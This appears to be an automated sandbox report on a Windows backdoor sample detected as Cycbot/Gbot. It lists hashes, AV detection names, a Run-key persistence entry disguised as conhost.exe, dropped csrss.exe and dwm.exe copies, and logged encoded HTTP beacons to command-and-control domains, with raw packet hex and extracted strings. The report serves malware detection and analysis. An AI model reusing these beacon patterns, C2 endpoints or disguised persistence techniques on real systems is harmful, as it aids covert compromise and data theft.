Analysis Date2014-11-19 13:13:36
MD532746b28d1f8afb62b6a50520d172024
SHA177b60d45102712763489fe226c2def3dc8f003b7

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 0df2635cee41738b78d01651b6b7a4c2 sha1: 992029d16d7301585a2c724ef1cadf5b5443b594 size: 105984
Section.rdata md5: 91ef994b026f963c8ba12bfe3e1848ae sha1: 76e9f58238d6312c3a36dae72c48304d64dee370 size: 1024
Section.data md5: 81b787e3d732ff348c61576678791df3 sha1: 8a6d82c91e3000a443d4920fcc081619a17fc7d5 size: 70144
Section.reloc md5: 53a5d592a0f7fde65b26f4b8279f45e5 sha1: 09c619af4d16cfb6d4b26ce5409ef96fc1c53514 size: 1024
Timestamp2005-09-16 12:26:55
PEhash3e041bf39703d2d6945cc0cc07b96c996f085821
IMPhashc3e002070f7c2f1af8a48b0cd0b852a0
AV360 SafeGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-449
AVDr. WebBackDoor.Gbot.69
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.SXV
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen7
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNScoolmediastore.com
Winsock DNSonlinesearchdb.com
Winsock DNSonlineinstitute.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSonlineinstitute.com
Type: A
67.227.195.200
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSyourblogresources.com
Type: A
DNSonlinesearchdb.com
Type: A
DNScoolmediastore.com
Type: A
HTTP GEThttp://onlineinstitute.com/g7/images/logo4.jpg?v31=80&tq=gKZEtzyuxWPd3MPuPjzR4qUIBGY2NhO5ThZ6oXRDB5mQ0TGo%2B5BuKArzwuDO9uRvyIVwPRdtRf3W5AICPs8Gn3gHjLLM5WEX2Ag2DgrVnvJWO9dkJiqEV45sgH6ZJBtcowD0OsBiORm58wN10FVNeq%2BMxJWc2XWkPAHU3do9LtUnKDgdZ8DMJ05Md6p%2BHAFXzXx7GboOorcHAddG%2Bv8nfAwXsA5mFlDecfMTEPJ8s0GBmlOVuGKGn1sTnEP92sXhT%2FfE4fTwfua%2FFF51up0Sp61oVuyrk%2BLHffx2r0NRKCgmkkmMIABzu5T%2F%2FnsXXEl4JnLQj3BI0YfhMqfCDz6Q9ZOArVDpVkueYA16qO18mZgVE%2FrAnqnSeCtSjhAKoIueUQ3dIjxWmrrt
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqJSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 67.227.195.200:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f67372f 696d6167 65732f6c   GET /g7/images/l
0x00000010 (00016)   6f676f34 2e6a7067 3f763331 3d383026   ogo4.jpg?v31=80&
0x00000020 (00032)   74713d67 4b5a4574 7a797578 57506433   tq=gKZEtzyuxWPd3
0x00000030 (00048)   4d507550 6a7a5234 71554942 4759324e   MPuPjzR4qUIBGY2N
0x00000040 (00064)   684f3554 685a366f 58524442 356d5130   hO5ThZ6oXRDB5mQ0
0x00000050 (00080)   54476f25 32423542 754b4172 7a777544   TGo%2B5BuKArzwuD
0x00000060 (00096)   4f397552 76794956 77505264 74526633   O9uRvyIVwPRdtRf3
0x00000070 (00112)   57354149 43507338 476e3367 486a4c4c   W5AICPs8Gn3gHjLL
0x00000080 (00128)   4d355745 58324167 32446772 566e764a   M5WEX2Ag2DgrVnvJ
0x00000090 (00144)   574f3964 6b4a6971 45563435 73674836   WO9dkJiqEV45sgH6
0x000000a0 (00160)   5a4a4274 636f7744 304f7342 694f526d   ZJBtcowD0OsBiORm
0x000000b0 (00176)   3538774e 31304656 4e657125 32424d78   58wN10FVNeq%2BMx
0x000000c0 (00192)   4a576332 58576b50 41485533 646f394c   JWc2XWkPAHU3do9L
0x000000d0 (00208)   74556e4b 4467645a 38444d4a 30354d64   tUnKDgdZ8DMJ05Md
0x000000e0 (00224)   36702532 42484146 587a5878 3747626f   6p%2BHAFXzXx7Gbo
0x000000f0 (00240)   4f6f7263 48416464 47253242 76386e66   OorcHAddG%2Bv8nf
0x00000100 (00256)   41775873 41356d46 6c446563 664d5445   AwXsA5mFlDecfMTE
0x00000110 (00272)   504a3873 3047426d 6c4f5675 474b476e   PJ8s0GBmlOVuGKGn
0x00000120 (00288)   3173546e 45503932 73586854 25324666   1sTnEP92sXhT%2Ff
0x00000130 (00304)   45346654 77667561 25324646 46353175   E4fTwfua%2FFF51u
0x00000140 (00320)   70305370 36316f56 7579726b 2532424c   p0Sp61oVuyrk%2BL
0x00000150 (00336)   48666678 3272304e 524b4367 6d6b6b6d   Hffx2r0NRKCgmkkm
0x00000160 (00352)   4d494142 7a753554 25324625 32466e73   MIABzu5T%2F%2Fns
0x00000170 (00368)   5858456c 344a6e4c 516a3342 49305966   XXEl4JnLQj3BI0Yf
0x00000180 (00384)   684d7166 43447a36 51395a4f 41725644   hMqfCDz6Q9ZOArVD
0x00000190 (00400)   70566b75 65594131 36714f31 386d5a67   pVkueYA16qO18mZg
0x000001a0 (00416)   56452532 4672416e 716e5365 4374536a   VE%2FrAnqnSeCtSj
0x000001b0 (00432)   68414b6f 49756555 51336449 6a78576d   hAKoIueUQ3dIjxWm
0x000001c0 (00448)   72727420 48545450 2f312e30 0d0a436f   rrt HTTP/1.0..Co
0x000001d0 (00464)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000001e0 (00480)   0a486f73 743a206f 6e6c696e 65696e73   .Host: onlineins
0x000001f0 (00496)   74697475 74652e63 6f6d0d0a 41636365   titute.com..Acce
0x00000200 (00512)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000210 (00528)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000220 (00544)   0d0a0d0a                              ....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42387976 55712532 4633766c   ij%2B8yvUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6564672e   1..Host: zonedg.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   206d6f7a 696c6c61 2f322e30 0d0a436f    mozilla/2.0..Co
0x00000100 (00256)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000110 (00272)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000120 (00288)   73650d0a 0d0a3932 73586854 25324666   se....92sXhT%2Ff
0x00000130 (00304)   45346654 77667561 25324646 46353175   E4fTwfua%2FFF51u
0x00000140 (00320)   70305370 36316f56 7579726b 2532424c   p0Sp61oVuyrk%2BL
0x00000150 (00336)   48666678 3272304e 524b4367 6d6b6b6d   Hffx2r0NRKCgmkkm
0x00000160 (00352)   4d494142 7a753554 25324625 32466e73   MIABzu5T%2F%2Fns
0x00000170 (00368)   5858456c 344a6e4c 516a3342 49305966   XXEl4JnLQj3BI0Yf
0x00000180 (00384)   684d7166 43447a36 51395a4f 41725644   hMqfCDz6Q9ZOArVD
0x00000190 (00400)   70566b75 65594131 36714f31 386d5a67   pVkueYA16qO18mZg
0x000001a0 (00416)   56452532 4672416e 716e5365 4374536a   VE%2FrAnqnSeCtSj
0x000001b0 (00432)   68414b6f 49756555 51336449 6a78576d   hAKoIueUQ3dIjxWm
0x000001c0 (00448)   72727420 48545450 2f312e30 0d0a436f   rrt HTTP/1.0..Co
0x000001d0 (00464)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000001e0 (00480)   0a486f73 743a206f 6e6c696e 65696e73   .Host: onlineins
0x000001f0 (00496)   74697475 74652e63 6f6d0d0a 41636365   titute.com..Acce
0x00000200 (00512)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000210 (00528)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000220 (00544)   0d0a0d0a                              ....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42383275 59764561 53253246   ij%2B82uYvEaS%2F
0x000000c0 (00192)   54253242 73714a53 72253246 65253242   T%2BsqJSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7563 68206669    close....uch fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53505425   ij%2B8yjYvEaSPT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 25324646 46353175   lose....%2FFF51u
0x00000140 (00320)   70305370 36316f56 7579726b 2532424c   p0Sp61oVuyrk%2BL
0x00000150 (00336)   48666678 3272304e 524b4367 6d6b6b6d   Hffx2r0NRKCgmkkm
0x00000160 (00352)   4d494142 7a753554 25324625 32466e73   MIABzu5T%2F%2Fns
0x00000170 (00368)   5858456c 344a6e4c 516a3342 49305966   XXEl4JnLQj3BI0Yf
0x00000180 (00384)   684d7166 43447a36 51395a4f 41725644   hMqfCDz6Q9ZOArVD
0x00000190 (00400)   70566b75 65594131 36714f31 386d5a67   pVkueYA16qO18mZg
0x000001a0 (00416)   56452532 4672416e 716e5365 4374536a   VE%2FrAnqnSeCtSj
0x000001b0 (00432)   68414b6f 49756555 51336449 6a78576d   hAKoIueUQ3dIjxWm
0x000001c0 (00448)   72727420 48545450 2f312e30 0d0a436f   rrt HTTP/1.0..Co
0x000001d0 (00464)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000001e0 (00480)   0a486f73 743a206f 6e6c696e 65696e73   .Host: onlineins
0x000001f0 (00496)   74697475 74652e63 6f6d0d0a 41636365   titute.com..Acce
0x00000200 (00512)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000210 (00528)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000220 (00544)   0d0a0d0a                              ....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 6c537225 32466525 32425635   2BsqlSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 0d0a7563 68206669   lose......uch fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
E@@..
.
WaP}.
.
W#.
...@..j@F
:
b.
.
.
.
..
..
\
.
080904b0
1.0.0.1
1418
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
```````
```````~~
`(@`;'$
^[-`"` 
~^^^^^^^^^^
~~~~~~~~~
<<<<<<<
=========
>>>>>>>
>>>>>.........
       
         ,,,
---\\\\\\\\\\\\
::::::::::::::&&&
:::????
??????
........
.........
...........
''''''
(((((((======
((((((((
))))))))
)&`@`"
]]]]]]]
{{{{{{{{{{{{{{
}}}}___
@@  `#%
$$$$$$$$$
*********
**********
\\\\\\\\\!!!
##########
%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
++++++
	,@   
[`````000
0000000000000000000```````````````
\0	3`R
&<09)R
&` 0P.
0Vq	|f
1$@ +$@
11111111
'''''''''''''''''111111D
@`1EnK
	@.1G8
1"m?]8(s
+2b}4C
2* `Dd
@2#>]w
 @ ,@`3
333@@@
333333
$$$$4}}}}}}}}}}
	4[2~b
43}Sq'
4CXhFn
4]DSECL
4hhhhhhhhhh
4=OV~Q+
5555555
?!5=f^$
`5_#H6q
5&@@o0
 `5r"``3)J\
.<5{)W
5zNyOE
~~~~~~~~~~;;;;<<66
666666
6.6\gsz
@6I3Kwn
6Tk^*s
|]6*+?!V
( @7[5	
759h"#
76n&zYT
777777777777
777LLL
7FR&i+2
]7LJoj
=}<7XE
83cJ.[z
84kTl[S
888888888888
8888888888888
8+Tgk,
8t:,`@I
99999999
,9999999999999
 99?????????lllllllllllllllooooo
9HEu$@
9V@3;F
&9vTR,
@?& @a
}aA$@`
A(A>3#O
aaaa...
aaaaaaaaaaa__
aaaaaaaaaaammmmmm
aa`D. 
*aaKKKKKK''
Addddddd
A=;hw 
+a|s'kH
[AteA\
AxUDiC
	b[~;	
b. @a(
\\\bbb##
""bbbb
bbbb((
@@@@@@@@@@@@BBBBBBBBBBBBBBBBBBww
BBBBBqqqq
b<C/pD
beedy3
-?[[bH]
`b;hPAPI
bk+EK%
BM8SECvJ
	bO*[}
BUeco_ f
BUh;+]
bv!r24
 @`/BY
 @c/*@
. @C4<
C:81:U
C8z$Ds
?C_ao{Y
ccccccc
"""""""CCCCCCCCCCC;;;;;
cccccccckkk
cgZX&*)*tJ&
CjYRV-X(
ClipCursor
cO ?(N{
CreatePopupMenu
$  C`W
CXL;)!
D5|EI.5
D8$ `,@
@.data
DDDDDDD,,,,,,
=D~D	S
DestroyMenu
D^_F* `
<dHvLu^
DK_IUB
Dn1Hz<
DPPPPPPP
DuplicateHandle
?e((<^7
@e9@5%
EAVpxj~WcL
Eddddd
eeeeeee
######EEEEEEE
'''''eeeexx
efHG6sv
E)jo\ @
-e&  n
EnumResourceNamesW
EQ>,`@Zy
ET~9FA
}|E["tM
EW$` 7
ewwwwwwwwwww
E)]%@Y(,R!
.f9?"<Y
f!DKscL
F]eE	BK:
ffffwwwweeeeeee
FindClose
FindFirstFileA
FindResourceExA
FindWindowA
fiV8.@
fJn/hb
FlushInstructionCache
/F@M4llRA
f?,T@ Q+
Fx<rip
f-Z}Sf
~G&@ +
`@<gc,
GetDesktopWindow
GetModuleFileNameW
gggggg
GGGGGG
gh;1%`
%^}{;gh$w
=?gL{W
GMy'\'_
 @?gx'$
GY/mGWA
  h{,`
@ h`;?
h:1f]N6
` HAQW
@@@@HHH;;
hhhhhhhh
hhhhhhhhhh}}}}}}CCCCCCCCCCCCnnnnnnn
@@h[+L
Hp|66	
;h'tn5P
`H= ]u
Hu@n7F:k
h+x5KdI
i<$@@|
||~)i$@ b
IF(@@[
I)]`FC
` iFq(@`
I	H^L3
((((((((ii88
:::III
IIIIII
iiiiiiiiiiGqqqqqqqqqqqqqqqqqqq
 Imx1:
I<pPd[
=iT	b,
I]'/'Vu
&|iY<eQ
/iyRlU3
   J8+co
>{j>A!
j[abF;
Jdi@&z
J ``dY
J'('`i
jjjjjjjjj
JJJJJJJJJ
JJJJJJJJJJ
JJJJJJJJJJJJJJJJJJJJ
jL#4L	
'jLCV.
jNEV~8
JPm	c<o
juhLN/
jWlM!h8
jXoN,@
JxvAfu
jzXP[7
%k 4Ck?
k5sXT_[
!k ]C4
KERNEL32.dll
KKKKKKKKK
koV@dD
K#RFQi
\krr?Z
=)?kRYJ
K" `T1
$ `L)!
L5s|<e
LL@@@@@@
``lllll
LLLLLL
]ls-82
LtR&jg
M(@`1aD
~m39d0
MapViewOfFile
M%]E{g
mFFFFx^^^^^^0	
@`=mJ<
M#Kf2>
MMMM###
mvB4ua6
[Mv{Ijd
Mwy:,aH
 ,@`n:
N`3B~&'
NdrComplexArrayFree
	+?Ne.
&n}KbJ
@`NM~1
NNNNNNN
nnnnnnnnnn					
Nqe=0c
N%/qi]
nTeXJ`M
NXXXXXXXXXXXX
N*zfe%
o1);"ue
o}`/9\
ObvIt)t
OfO%MsQ
[O=igF/xa
oKrbl2
....oooo%%%
ooooooooo
ooooooooooooooo
OOOOOPPPPPPPU
 `oP^i
@>orj8
P+++++++++
p\2ml`_U
P3D%v=
P7$@ 0c
pAL?2^o-hp
 pHxf>
P/kNG;
#########PP
ppC{`B
ppp	LLLLLLLL
pppppp
PPPPPPPPPPPP
PPPPPPPPPPPPPPPPPP
ppppppppppppppppppppppp
pppppp RRR
 >:P\r,
p!td?F
PytahA
q!)`.` + 
Q @ /"`
q#4Lz>
Q}oTU+k~
qqqqqq
\QQQQQQ
qqqqqwwwwww
qUde$`
 {,  !QX
QxxUYz
````````________qy
r-1`:v
R:*2Vnt
@R3,@ 
r =9=H
`.rdata
RedrawWindow
.reloc
` =RF	
r=;[%j
Rj3Ey$ 
RPCRT4.dll
RQH]Xif
R*@ :/QW
RRRRRRRR
rs	;3V
R~]t8m
\rTttC3*
R~w{ay
 @|S` 
|s0|lm
SetFileShortNameW
SHELL32.dll
Shell_NotifyIconA
sj0lc`yf
sj#T-m/Z
SS\\\\\
Ss&myM
SSSSSSS
SS".X"
S>xAr#*
T*~	&c
tfi3UVw
!This program cannot be run in DOS mode.
timeEndPeriod
tk%Z=H
T&-na.
(t=NB[gs?
tn&  HW
TrackPopupMenuEx
TTTT|||
tttt55555555
ttttttttt
ttttttttt				{{
tttttttttt
ttwp5O5
U0n24L
~%u}/7
u7%D/h
;[u7t-g*
uA~TV[\a
uEfFrY
*@@UGd
uI\>Q~
UnmapViewOfFile
U'Qhl[)
USER32
UuidCreate
{{{{UUUUU
uuuuuL
uuuuuukkkkk
UUUUUUU
UUUUUUUUUUU
//Uvvv
[>v4' Lq
V69Ms+Y
=V9kc?b
V~f"@ 	
`:vH4'
vP[IR"`
V.pq@E
V	SyD1
vvBBBB
VVV@@@??????
V^Y|J1J0T
w*``^:
WA&&>y{
wG%W>a
WINMM.dll
]wR$ `
w[*V5##0B
wwa+qo0r
wwwwww
WWWWWW
wwwwwww
WWWWWWWW
``wwwwwwwwwww
^wx2wk
`WXMHT6='
@x. `}:2
xC]Igr
xCO/*`
x}	GmDGo
XOu8vb
$  :XWO
XX!___
XXXccc
XXXvvv
XXXXXXXX
xxxxxxxxxxxx
`Y5R|7
!.y 80
Y83:m.p
Y+bBSl
YJt8jAS
YOv#O!
yU `@ @ J
YuU)U6
yyh!<DSD
y&y,KT
yyyyyy
##yyyyyyy
YYYYYYYYYYYYYYYYYY
y<^ZeOG
|$Z[($
z2xL#D[j
z{4|W#
>z<B%d
_______zD77
z}ghd^Z
++z[I:.-
Ztr/}(
